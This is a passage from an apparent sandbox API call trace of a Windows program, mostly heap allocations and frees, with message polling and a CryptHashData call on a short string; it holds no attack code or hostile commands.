hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0262.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0262.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0262.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0262.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0262.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0262.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0262.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0262.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0262.796] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0262.796] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0262.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0262.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0262.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0262.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0262.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0262.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0262.796] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0262.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0262.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0262.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0262.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0262.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0262.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0262.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0262.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0262.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0262.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0262.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0262.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0262.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0262.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0262.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0262.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0262.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0262.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0262.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0262.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0262.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0262.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0262.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0262.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0262.798] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0262.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0262.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0262.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0262.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0262.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0262.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0262.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0262.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0262.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0262.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0262.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0262.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0262.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0262.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0262.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0262.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0262.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550d8 [0262.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0262.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0262.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0262.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0262.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0262.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0262.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0262.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0262.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0262.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0262.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0262.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0262.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0262.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0262.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0262.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0262.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0262.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0262.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0262.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0262.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0262.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0262.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0262.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55108 [0262.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0262.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0262.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0262.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0262.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0262.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0262.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0262.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0262.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0262.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0262.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0262.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0262.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0262.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0262.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0262.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0262.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0262.802] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0262.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0262.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0262.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0262.802] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0262.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0262.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0262.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0262.802] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0262.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0262.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0262.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0262.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0262.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0262.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0262.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0262.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0262.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0262.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0262.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0262.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0262.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0262.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0262.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0262.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0262.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0262.805] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0262.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51e50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0262.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0262.805] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0262.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0262.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0262.805] CryptHashData (hHash=0xa87250, pbData=0x2e550d8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0262.806] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 